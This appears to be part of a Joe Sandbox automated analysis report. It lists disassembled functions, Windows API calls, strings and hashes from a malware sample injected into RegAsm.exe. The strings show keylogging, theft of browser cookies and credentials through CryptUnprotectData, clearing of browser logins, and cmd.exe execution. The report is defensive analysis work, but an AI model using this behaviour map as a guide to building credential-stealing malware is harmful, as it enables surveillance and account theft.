                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                  APIs
                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                  • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                  • wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                  • API String ID: 1497725170-1359877963
                                                  • Opcode ID: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                  • Opcode Fuzzy Hash: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                  • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  • API String ID: 2574300362-2380590389
                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                  • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                  • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                  • String ID: !D@
                                                  • API String ID: 3446828153-604454484
                                                  • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                  • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                  APIs
                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll
                                                  • API String ID: 1646373207-2714051624
                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                  • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                  • Opcode Fuzzy Hash: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                  APIs
                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                  • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                  • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 39102293-0
                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
